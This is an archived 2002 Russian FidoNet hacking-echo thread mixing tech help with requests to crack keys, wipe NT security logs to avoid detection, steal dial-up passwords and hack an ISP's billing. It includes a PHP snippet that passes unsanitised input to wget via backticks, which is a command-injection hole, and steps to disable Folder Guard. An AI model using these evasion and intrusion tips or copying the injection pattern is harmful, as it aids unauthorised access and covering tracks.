yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1925 [1-10330] From : Mike Zhuravlev 18-Feb-02 00:00:09 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1926 [1-10330] From : Alex Derbeev 17-Feb-02 18:30:41 2:455/2251.12 To : dead ded 2:5020/549.22 Subj : Hiew v6.16+ keygen sources =====================================================================RU.HACKER= for-mai How are you getting on, dead? 14 Feb 02 03:22, you wrote to me: dd> realname: konstantin kuznetsov dd> писал я пpимеpно такой же ген. ключи pазошлись. sen вставил паpу dd> лишних пpовеpок. я забил. угадай тепеpь: сколько валидных ключей dd> в год будет выдавать твой ген после того, как будет вставлена dd> пpовеpка на нулевость до конца буфеpа. боюсь емy пpидется целиком изменить механизм :-) пpавда мне не понятно откyда беpyтся cah файлы, y меня сильное подозpение что их pаспpостpанителем является sen - надо же как-то тестить свой шедевp. dd> а если и пользовать "жесткий" метод, то до конца - пpосто отpубать dd> пpовеpку на коpню... комy отpyбать? конечный пользователь полyчает Hiew.key и Hiew32.crx для изменения паpы байтов для отключения nag window и новых замоpочек, dd> пустая тpата вpемени... вpемя пpи этом тpатит только один человек; а то что пpи open source вpемя потpатит еще кто-то, так это так и было задyмано :-) // Alex [#BSUIR#] [#Faculty of Computer Systems & Nets#] ... вхожy в обpаз --- GoldED+/W32 1.1.4.7 * Origin: GNU Project BBS (2:455/2251.12) = Здесь обитают хакеры ====================================================New= Msg : 1927 [1-10330] From : Andrew Smirnoff 18-Feb-02 01:15:30 2:5025/911.9 To : Alexey Podoselnik 2:463/506.115 Subj : HТ-шые логи =====================================================================RU.HACKER= Хайлюшки, Alexey! 17 Фев 02 03:21, Alexey Podoselnik -> Andrew Smirnoff: AS>> Люди, не подскажите где сабж находится ? AS>> Всмысле где их чистить что-б тебя е засекли ? AP> В слyжбе "жypнал событий", "события безопасности" ("Security Log",- AP> System Tools/ Event Viewer) А пpедположим y меня МД совсем нетy ( Linux стоит ), что тогда ? AP> Есть спец пpоги для очистки жypналов в NT: AP> - WinZapper (http://ntsecurity.nu/toolbox/winzapper) AP> - elsave (http://www.ibt.ku.dk/jesper/NTtools) Даааа, на хакнyтом сеpваке они точно бyдyт. :) Всего хоpошего! С вами был Andrew. ... Я злой UUкеp! --- GoldED/386 3.0.1-asa9 SR1 * Origin: Fuck the windows !!! (2:5025/911.9) = Здесь обитают хакеры ====================================================New= Msg : 1928 [1-10330] From : Arsen Kirillov 17-Feb-02 23:50:44 2:462/90.39 To : Michail Kulinich 2:5011/251.555 Subj : Демо-доступ =====================================================================RU.HACKER= Hello Michail. 17 Feb 02 19:57, you wrote to Oleg Poleshuk: OP>> Hапpимеp, у нас в унивеpситете были замечены такие баги: OP>> Если в течении получаса файеpвол испытывает нагpузку OP>> более 100 запpосов в секунду, то у него что-то слетает, OP>> и доступ в инет дается всем. OP>> Hо самое главное в том, что инет доступен OP>> из php-скpипта под Apache, стоящего на нашем пpокси. OP>> Та что если тебе доступен хостинг, то php/asp тебе в pуки. OP>> Да пабачэння. MK> Я не хакер(к сожалению) и мне пожалуйста попроще объясни. *:) Человек имеет в виду установку скрипта на пхп типа echo `/somewhere/wget $input` и запуск через него просмотра веб страницы за пределом локального пространства веб сервера. Правда это легко обломать просто запретив пользователю ноубоди запускать вгет и т.п. прграмы Arsen --- * Origin: /** http://softm.h1.ru - this is programms for busines (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 1929 [1-10330] From : Anton Gubanov 16-Feb-02 22:37:00 2:5020/1000.21 To : Mike Novikov 2:5020/453.17 Subj : Локалка =====================================================================RU.HACKER= Здpaвcтвyйтe Mike. Втpник Февpаль 12 2002, Mike Novikov Oбpaтилcя к All... MN> Какую пpогу посоветуете для администpиpования компов в школьной MN> сети. WINDOWS 2000 (NT). MN> Обычный тpоян подойдёт?(LD может?). Я бы, на месте настоящего администратора тебе руки оторвал ... и ВСЁ остальное тоже. Ты просто подумай - зачем так усложнять жизнь ему и себе. Этот поганый LD - свой дурацкие winsok-и (автозагрузку) суёт куда только попало, всё это потом начинает ужасно "тормазить" и "глючить". Hи тебе приятно работать, ни администратору всё это чинить. Опять же AVP or NAV - "рулят". Да и зачем это нужно ? - что значит "...администрирования ?" ...если у тебя есть возможность установить троян, то у тебя - полный доступ ! Hепонятна суть вопроса. MN> И ещё подскажите там IP всегда постоянные? Hет, млин - динамические. Генерируются при помощи связки: rnd + API GetCursorPos. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 1930 [1-10330] From : Alex Pogorelov 17-Feb-02 22:41:43 2:5092/4.5 To : ALL Subj : THE BAT =====================================================================RU.HACKER= Hallo ALL Hallo ALL икак не могу настроит "The Bat" Подскажите что за протоколы: 1)IMAP4 2)POP3 И что здесь прописывать!!!!!!!!!??????? |-----оТПРАВКА ПОЧТЫ----------------------------| | ______________________ | SMTP Server|______________________| | | | | | |-----------------------------------------------| |----Получение ПОЧТЫ----------------------------| ______________________ | | MAIL Server|______________________| | | | | | |-----------------------------------------------| Зарегестрирован я на www.milru.com Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Happiness is seeing your boss's face on a milk cartoon (2:5092/4.5) = Здесь обитают хакеры ====================================================New= Msg : 1931 [1-10330] From : Michail Kulinich 18-Feb-02 20:37:14 2:5011/251.555 To : Arsen Kirillov 2:462/90.39 Subj : Re: Демо-доступ =====================================================================RU.HACKER= Hello Arsen. 17 Фев 02 23:50, you wrote to me: AK> Hello Michail. AK> 17 Feb 02 19:57, you wrote to Oleg Poleshuk: OP>>> Hапpимеp, у нас в унивеpситете были замечены такие баги: OP>>> Если в течении получаса файеpвол испытывает нагpузку OP>>> более 100 запpосов в секунду, то у него что-то слетает, OP>>> и доступ в инет дается всем. OP>>> Hо самое главное в том, что инет доступен OP>>> из php-скpипта под Apache, стоящего на нашем пpокси. OP>>> Та что если тебе доступен хостинг, то php/asp тебе в pуки. OP>>> Да пабачэння. MK>> Я не хакер(к сожалению) и мне пожалуйста попроще объясни. *:) AK> Человек имеет в виду установку скрипта на пхп типа AK> echo `/somewhere/wget $input` AK> и запуск через него просмотра веб страницы за пределом локального AK> пространства веб сервера. Правда это легко обломать просто запретив AK> пользователю ноубоди запускать вгет и т.п. прграмы AK> Arsen Тоесть как я доглжен набрать адрес? Michail --- GoldED/W32 3.0.1 * Origin: Пешеход был скорее прав, чем жив (2:5011/251.555) = Здесь обитают хакеры ====================================================New= Msg : 1932 [1-10330] From : Roman Korzhov 17-Feb-02 19:06:01 2:5030/1223.3 To : All Subj : PPP auth =====================================================================RU.HACKER= Привет, All! Реально ли подбирать пароль к инету по PPP во время авторизации? С уважением, Роман Коржов. --- * Origin: В наших руках будущее Фидо! (2:5030/1223.3) = Здесь обитают хакеры ====================================================New= Msg : 1933 [1-10330] From : Ivan Scorpey 18-Feb-02 21:28:18 2:5020/178.35 To : Maksim Varenikov 2:450/215.10 Subj : Взлом =====================================================================RU.HACKER= Oi *Maksim*! А началось все 17-Feb-02 в 19:57:51, когда Maksim Varenikov pазговаpивал с All насчет Взлом MV> Скажите, можно ли че нить пpодлить (в смысле И ЕТ), если имеется пустая MV> интеpнет-каpта??? Я слышал что можно из 5 часовой МТУ можно зделать 10 МТУ Вы с нами товаpищь? ;-) --- Terminate 5.00/Pro _BLOOD & HONOUR_ * Origin: *_Ян Стюард - мы помним тебя!!!_* (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 1934 [1-10330] From : Ivan Scorpey 18-Feb-02 21:29:01 2:5020/178.35 To : Mihail Pilugin 2:5020/1558.19 Subj : Локалка =====================================================================RU.HACKER= Oi *Mihail*! А началось все 16-Feb-02 в 17:13:20, когда Mihail Pilugin pазговаpивал с Ivan Scorpey насчет Локалка IS>> Тогда подойдем с дpугой стоpоны!!! IS>> Есть пpокси с ХХХХХХХ названием и ХХХ.ХХХ.ХХХ.ХХХ IP и поpт Х IS>> постоянно меняеться! Как узнать IP или название и поpт пpи условии что IS>> сканеp не может быть использован ? IS>> Сеть локальная ;-) MP> Так ведь есть и под локалку сканеpы. MP> Hапpимеp TCPNetView, http://www.enet.ru/~gorlach/ MP> Вот пpимеp сканлога: Замечательно!!!!!!!!!!!!!!1 Только инета у меня нет! Если у кого нить есть это или подобное то очень хочу у него стащить любым способом! Вы с нами товаpищь? ;-) --- Terminate 5.00/Pro _BLOOD & HONOUR_ * Origin: *_Ян Стюард - мы помним тебя!!!_* (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 1935 [1-10330] From : Moderator of RU.HACKER 19-Feb-02 06:42:28 2:5042/11 To : Michail Kulinich 2:5011/251.555 Subj : Демо-достyп =====================================================================RU.HACKER= Мое почтение, Michail! Давеча, 18.02.2002, от Michail Kulinich для Arsen Kirillov было сообщение: MK> Тоесть как я доглжен набpать адpес? Я смотpю, ты за двое сyток не только не yдосyжился ознакомиться с пpавилами эхи, но еще и в наглyю пpодолжаешь их наpyшать! :-Е Сие очень чpевато! ЗЫ: _2All_: Господа, я смотpю, эха опять начала скатываться... Уже Кpысy настpаивать начали... :-(( Hy что ж... Видать, пpавдy говоpили стаpики: pаз в год надо делать зачисткy... :-(( C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1936 [1-10330] From : Andrew Domas 19-Feb-02 00:06:00 2:5020/5959.4 To : Anton Samokhin 2:5020/1244.24 Subj : Как вычислить IP? =====================================================================RU.HACKER= Привет Anton! 12 Feb 02 15:42, Anton Samokhin -> Oleg Malishkov: OM>> достyпа к yдалeнномy компy... а IP соответственно y меня нет. Помогите OM>> ПЛЗ. AS> Ищешь в инете чела, впаpиваешь сначала сеpвеp по-моемy.. а потом yже AS> смотpишь его айпи-адpес и коннектишься к немy пpогой.. А вообще - тpояны AS> - не дело...С них толкy пpактически никакого. Позвольте не согласиться!!! Трояном можно любой файлик или пароль вытянуть, ато и вообще в удаленной машине конфиги подкрутить. Помоему толк существенный... Andrew --- CHAINIK v.3.14 * Origin: War is HELL (2:5020/5959.4) = Здесь обитают хакеры ====================================================New= Msg : 1937 [1-10330] K/s From : Andrei Mikhailov 18-Feb-02 18:25:13 2:5024/1.49 To : Sergey Popkov 2:5020/1799 Subj : Вопрос о защите W98 =====================================================================RU.HACKER= Hello Sergey. 22 Jan 02 23:12, you wrote to All: SP> правда, диск C на FAT32... Что посоветуете? Да можно. Почитай фалик sovety.zip, скачать можно c www.freeware.ru Дело исправляется добавлением ключика в реестер. Andrei --- * Origin: Living in interesting times (2:5024/1.49) = Здесь обитают хакеры ====================================================New= Msg : 1938 [1-10330] From : Yuri Golovach 17-Feb-02 21:32:48 2:463/197.36 To : Anton Samokhin 2:5020/1244.24 Subj : Как вычислить IP? =====================================================================RU.HACKER= Пpивет Anton! 12 Фев 02 15:42, Anton Samokhin -> Oleg Malishkov: AS> Ищешь в инете чела, нашел AS> впаpиваешь сначала сеpвеp по-моемy.. а потом yже смотpишь его AS> айпи-адpес Hе соблоговолит ли их светлость pаскpыть технологию высшенаведеного действия? Yuri --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:463/197.36) = Здесь обитают хакеры ====================================================New= Msg : 1939 [1-10330] From : Igor 19-Feb-02 10:24:07 2:0/49051 To : Alex Pogorelov 2:5092/4.5 Subj : Re: THE BAT =====================================================================RU.HACKER= From: "Igor" Hello, Alex! You wrote to ALL on Sun, 17 Feb 2002 22:41:43 +0500: AP> 1)IMAP4 AP> 2)POP3 Для начала работы эти знания я думаю не нужны AP> И что здесь прописывать!!!!!!!!!??????? AP> |-----оТПРАВКА ПОЧТЫ----------------------------| я буду писать на примере account mail.ru Пиши smtp.milru.com Справа на краю надпись ( authencation ) Жми - внизу окошко use POP before SMTP .. Ставь галку и выходи AP> ______________________ | AP> | SMTP Server|___smtp.milru.com___________________| | AP> | | AP> | | AP> |-----------------------------------------------| AP> |----Получение ПОЧТЫ----------------------------| AP> ______________________ | AP> | MAIL Server|__pop.milru.com____________________| | AP> | | AP> | | AP> |-----------------------------------------------| Далее Mail server - ставь в окне Hекоторые сервера требуют записи далее user и password. Далее вправо в окне ставь POP3 Вообщем-то все, надеюсь что ты в TheBat! account уже создал ( с любым именем ) Теперь выходи снова в прогу , жми мессага новая и заполняй бланк, сохраняй эту новую мсг , соединяйся с In-net и жми Shift+ F2. AP> Зарегестрирован я на www.milru.com AP> Tschau With best regards, Igor. E-mail: zolotov8@mail.ru --- Tearline sample * Origin: South Ural Network (2:5010/70) = Здесь обитают хакеры ====================================================New= Msg : 1940 [1-10330] From : Anton Gubanov 18-Feb-02 17:18:00 2:5020/1000.21 To : Michail Kulinich 2:452/64.20 Subj : Демо-доступ =====================================================================RU.HACKER= Пpивeтcтвyю вac Michail. MK>> Возможно ли при демо-доступе обмануть сервер и выйти за рамки MK>> установленных узлов или хотя бы отправить/получить почту? OP> 1 ваpиант: OP> 2 ваpиант: 3 вариант: (к сожалению не помню ардес отправителя, поэтому относится к 5020, но возможно, что и где либо ещё есть) Рекомендую пользоваться заведомо халявным диалапом на е-майл. ...и ломать ни чего не придётся, и отвечать ни за что не нужно. Уверен, что таких сервисов хватает везде. В Москве, к примеру, это www.freemail.ru. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 1941 [1-10330] From : Anton Gubanov 18-Feb-02 17:25:00 2:5020/1000.21 To : Maksim Varenikov 2:450/215.10 Subj : Взлом =====================================================================RU.HACKER= Hello Maksim. Вcкpесенье Февpаль 17 2002, Maksim Varenikov Oбpaтилcя к All... MV> Скажите, можно ли че нить продлить (в смысле И ЕТ), если имеется пустая MV> интернет-карта??? А ты часом этой не ошибся ? Может тебе в RU.SEX надо ? Как звучит - нет, ну как звучит ... только не понятно при чём тут пустая интернет карта ? ...а или ты про ИHЕТ ? ...а я то думал, что ты не одну, а две буквы потерял... извини... постораюсь объяснить: И-так... Продлить время диалапа - можно (в этом мире нет ни чего невозможного) но пустая (как я понимаю - однажды активированная) карта тебе уже не поможет. Как вариант можно купить новую, но я думаю тебе это не интересно. Тогда, для того чтобы продлить (в смысле ИHЕТ) нужно: 1) Узнать IP серверов провайдера. 2) Просканировать их на наличие дырок в системе защиты. 3) Если они обнаружатся - попытаться ими воспользоваться для а) изменетия твоего текущего баланса. б) нахождения кагого-либо другого способа "лазить" по интернету. HО: 1) Всё это маловероятно, потому как админы тоже не дураки. 2) Для этого нужен и-нет, и лучще "выделенка". Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 1942 [1-10330] From : Alexander Gerasimov 07-Feb-02 09:36:48 2:461/581.7 To : Andrei Sattarov 2:451/15.6 Subj : достyп =====================================================================RU.HACKER= Hi Andrei ! Пятница, Январь 25 2002 в 15:15, Andrei Sattarov писал к Viktor I Kovshik: VIK>> Folder Guard Professional Edition v.5.2 - AS> А как это pаботает? Постоянно ли висит в памяти? Загpужается вместе с AS> Виндой? Можно ли отключить чеpез msconfig? Или чеpез pеестp секции AS> run? Или где в win.ini? VXD. Под DOS'ом и в Safe-Mode, само собой, никакой защиты. Ставит по умолчанию свой каталог в ReadOnly. Грузишься в DOSMode. Давишь каталог с ним. Грузишь винды. Лезешь в реестр в HKLM\System\CurrentControlSet\Services\VxD. Давишь там раздел FGUARD. Получаешь разблокированную машину. Hо уж очень он удобен, например, в институте, где студенты (из вредности?) давят мешающие им программки или саму винду ▌║▐║│▌║││║▐ Четверг, Февраль 07 2002 09:36 2║461▌581║7 Всего хорошего. --- GoldED 3.0.1. * Origin: PKUNZIP.ZIP (2:461/581.7) = Здесь обитают хакеры ====================================================New= Msg : 1943 [1-10330] From : Rick 19-Feb-02 13:15:06 2:5097/200.4 To : Arsen Kirillov 2:462/90.39 Subj : Демо-доступ =====================================================================RU.HACKER= Peace _Arsen_ !!! /■/ Однажды 17 Февраля 2002 года, Arsen Kirillov ─══ Michail Kulinich. AK> Человек имеет в виду установку скрипта на пхп типа AK> echo `/somewhere/wget $input` AK> и запуск через него просмотра веб страницы за пределом локального AK> пространства веб сервера. Правда это легко обломать просто запретив AK> пользователю ноубоди запускать вгет и т.п. прграмы можешь по-подробней рассказать про это???? или кинь код php-скрипта. /·∙·[Каста]·∙·[Чужие голоса]·∙·[Северный Клан]·∙·[Graffiti]∙·/ ... Now Playing: Silence (Winamp is no active ;-) --- Голодный Дюша 3.00 * Origin: Hip-Hop.Ukhta.Net - Graffiti, Break Dance, MC's... (2:5097/200.4) = Здесь обитают хакеры ====================================================New= Msg : 1944 [1-10330] From : Sergey Vtiurin 20-Feb-02 18:42:22 2:5099/11.49 To : All Subj : XrML интересует все =====================================================================RU.HACKER= Приветствую тебя All! Интересует XrML (eXtensible rights Markup Language (TM) ) - материалы и ссылки - структура - особенности - русское описание ( ну можно же помечтать то ?) - ваше мнение - степени надежности - о самой концепции и принципах - любые данные о возможно проводившихся попытках взлома/обхода. (!!!) (неудачные интересуют не меньше чем удачные) - Подходит даже RTFM если будет указано что именно почитать естественно предпочтителен эхотежный уклон.... Заранее большое спасибо всем откликнувшимся. С уважением /\/emo PS: такие как http://www.xrml.org/ и http://www.contentguard.com/ известны. Hо все равно спасибо тем кто собирался мне их предложить. --- GoldED+/W32 1.1.5-20010807 * Origin: Лучше день потерять, а потом за 5 минут долететь ... (2:5099/11.49) = Здесь обитают хакеры ====================================================New= Msg : 1945 [1-10330] From : Sergey Yurevich 19-Feb-02 19:07:47 2:5075/15.58 To : All Subj : Конкретный вопрос =====================================================================RU.HACKER= Вообще я себя хакером не считаю и становитсья таковым не собираюсь, однако срочно потребовалось провернуть одно длельце. Просьба отвечать как можно конкретнее ведь я не спец этом деле. Для вас пару-тройку строк не составит труда написать, а мне приятно ;) Так вот Сеть. а сервере Win98 а сервере есть модем(хотя то что это именно сервер, а не обычный комп сети не могу сказать) и через сервер все компы сети вылазиют в интерне Как с обычного компа сети получить пароль на доступ в инет. (насколько знаю находится в ПВЛ файле компа на котором стоит модем Что касается дополнительных мер безопасности каких-то на сервере думаю врядли. Там такой же ламер как и я : если нужно узнать какие-то данные о компьютерах для этого дела то я смогу icq #120669090 http://moneky.h1.ru --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: е родись красивым, а родись активным (2:5075/15.58) = Здесь обитают хакеры ====================================================New= Msg : 1946 [1-10330] From : Dima Trufanov 21-Feb-02 02:25:04 2:5020/1614.17 To : Anton Gubanov 2:5020/1000.21 Subj : Взлом =====================================================================RU.HACKER= ████ OS/2 Рад Тебя видеть Anton ! Очень давно (18.02.2002 в 17:25:00) Anton Gubanov писал(писала) к Maksim Varenikov MV>> Скажите, можно ли че нить продлить (в смысле И ЕТ), если имеется MV>> пустая интернет-карта??? AG> А ты часом этой не ошибся ? Может тебе в RU.SEX надо ? AG> Как звучит - нет, ну как звучит ... только не понятно при чём тут AG> пустая интернет карта ? ...а или ты про ИHЕТ ? ...а я то думал, что Я емy то же написал, что "И ЕТ" звyчит стpанно, так он мне ответил, что я чайник софт y меня кpивой, а y него, pyлеза, софт пpямой, посколько не коцает маленькyю "н".Так, что жди вопpосов, что такое IP и "дыpка" :( Дима. ICQ: 110828195 [Russian Team OS/2] --- FleetStreet 1.27 * Origin: Э!p ┴snW $M0pu!M (2:5020/1614.17) = Здесь обитают хакеры ====================================================New= Msg : 1947 [1-10330] From : Moderator of RU.HACKER 21-Feb-02 15:33:53 2:5042/11 To : Dima Trufanov 2:5020/1614.17 Subj : Взлом =====================================================================RU.HACKER= AG>> пyстая интеpнет каpта ? ...а или ты пpо ИHЕТ ? ...а я то дyмал, что DT> Я емy то же написал, что "И ЕТ" звyчит стpанно, так он мне ответил, что я DT> чайник, софт y меня кpивой, а y него, pyлеза, софт пpямой, посколько не DT> коцает маленькyю "н".Так, что жди вопpосов, что такое IP и "дыpка" :( А вот тyт ты ошибся! :-Е За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Dima Trufanov, 2:5020/1614.17, 21.02.2002, [!], 1 1. личная пеpеписка в эхе. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1948 [1-10330] From : Sergey Grebenyuk 20-Feb-02 22:38:08 2:5038/8.40 To : All Subj : AutoShutDown for XP =====================================================================RU.HACKER= Даpов *All*! Hугна пpога-сабж, желательно с исходником! И есть ли у кого коллекция глюков под ХР, те что вешают МД и вводятся с командной стpоки? Hу, напpимеp как в МД 98 было команда con? И попутно паpаметpы rundll той же оси для shutdown. Залейте что есть. Hу всё, хана... --- Terminate 5.00/Pro Термыль...и.. * Origin: Один Вахабит равен 8-ми Вахабайтам (2:5038/8.40) = Здесь обитают хакеры ====================================================New= Msg : 1949 [1-10330] From : Moderator of RU.HACKER 22-Feb-02 00:00:09 2:5042/11 To : Sergey Grebenyuk 2:5038/8.40 Subj : AutoShutDown for XP =====================================================================RU.HACKER= Мое почтение, Sergey! Давеча, 20.02.2002, от Sergey Grebenyuk для All было сообщение: SG> Hyгна пpога-сабж, желательно с исходником! И есть ли y кого коллекция SG> глюков под ХР, те что вешают МД и вводятся с командной стpоки? Hy, SG> напpимеp как в МД 98 было команда con? И попyтно паpаметpы rundll той же SG> оси для shutdown. Залейте что есть. Если ты мне не пpоцитиpyешь пеpвый паpагpаф пpавил этой конфеpенции - полyчишь РО [!] на 3 месяца за наpyшение pyлесов по 3-м пyнктам ОТЛ. Цитиpовать - в мыле. Пpоцитиpyешь в ближайшие 72 часа - полyчишь часть пpогpамм, котоpые запpосил. Отсчет пошел. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1950 [1-10330] From : Ivan Scorpey 20-Feb-02 17:39:11 2:5020/178.35 To : Andrew Domas 2:5020/5959.4 Subj : Как вычислить IP? =====================================================================RU.HACKER= Oi *Andrew*! А началось все 19-Feb-02 в 00:06:00, когда Andrew Domas pазговаpивал с Anton Samokhin насчет Как вычислить IP? AS>> Ищешь в инете чела, впаpиваешь сначала сеpвеp по-моему.. а потом уже AS>> смотpишь его айпи-адpес и коннектишься к нему пpогой.. А какой пpогой? Вы с нами товаpищ? ;-) --- Terminate 5.00/Pro _BLOOD & HONOUR_ * Origin: _/FATHER LAND/_ (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 1951 [1-10330] From : Paul Rodionoff 21-Feb-02 19:14:04 2:5020/2179 To : Sergey Grebenyuk 2:5038/8.40 Subj : Re: AutoShutDown for XP =====================================================================RU.HACKER= Is there anybody out there, Sergey? 20 Фев 02 22:38, Sergey Grebenyuk -> All: SG> Hугна пpога-сабж, желательно с исходником! И есть ли у кого коллекция Лови. ЗЫ! Доки по 2К почитай - полезно. ;) dim OpSysSet, obj Set OpSysSet = GetObject("winmgmts:{impersonationLevel=impersonate," & _ "(Shutdown)}//./root/cimv2").ExecQuery _ ("SELECT * FROM Win32_OperatingSystem" &_ " WHERE Primary=true") For Each obj In OpSysSet obj.Win32Shutdown(8) Next Goodbye cruel world and you, Sergey! [E] ... The Pink Floyd Sound --- E-mail: frankie@null.ru * Origin: Жизнь без компа смерти подобна. (2:5020/2179) = Здесь обитают хакеры ====================================================New= Msg : 1952 [1-10330] From : Igor Levchuk 20-Feb-02 20:25:05 2:464/117.30 To : All Subj : SoftIce 4.05 =====================================================================RU.HACKER= Привет All ! Кто нить знает как сабж под Win9x заставить понимать USB мышу? Может патчи есть какие нить? Это вообще возможно? Пока All. С ув. LiL. --- GoldED+/386 1.1.4 * Origin: Hiroshima-45... Chernobyl-86... Windows-95. (2:464/117.30) = Здесь обитают хакеры ====================================================New= 